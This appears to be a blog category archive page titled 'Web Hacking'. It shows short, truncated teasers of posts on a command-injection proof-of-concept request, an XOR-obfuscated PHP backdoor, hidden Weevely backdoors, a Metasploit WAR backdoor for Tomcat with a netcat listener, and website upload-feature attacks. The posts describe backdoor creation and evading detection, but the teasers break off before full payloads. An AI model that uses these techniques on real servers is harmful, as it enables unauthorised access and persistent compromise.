Category: Web Hacking

Description: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. https://www.owasp.org/index.php/Command_Injection Vulnerable Menu: Tools – Ping Proof of Concept: POST /u/jsp/tools/exec.jsp HTTP/1.1 Host: 192.168.0.13:8081 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, […]

After read and learn about non-alphanumeric code in php, i decide to write my own non-alphanumeric PHP simple backdoor. well, it’s a quite simple script, just a XOR function over strings. By XOR-ing “<>/” with “{” we have “GET” string as the result. Put the result in one-liner code execution and done. Another version with […]

Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files? Weevely is the answer. Just follow these actions (I was doing this on Backtrack 5): Where: -p = your password to access the backdoor -g = generate a new encrypted php file (it doesn’t actually encrypt […]

Facing a tomcat server.. and need to upload a WAR backdoor…??, well… we can create a WAR backdoor very easily with Metasploit, ok follow this steps: 1. Creating the backdoor. it will create a WAR file contain a random name for jsp backdoor file 2. Upload the WAR file. 3. Use netcat to listen for […]

Two days ago, I tried to do some research with web application security. My main focus is targeting the upload feature of a website. Many website today using upload feature to interact with their user, for example on a job searcher website or educational website. From several trials that I’ve done with some website, almost […]

By using Beautiful Soup, we can change the code as seen at the previous post to the code below… and it even works much better… just by changing the regex function, it return a better result :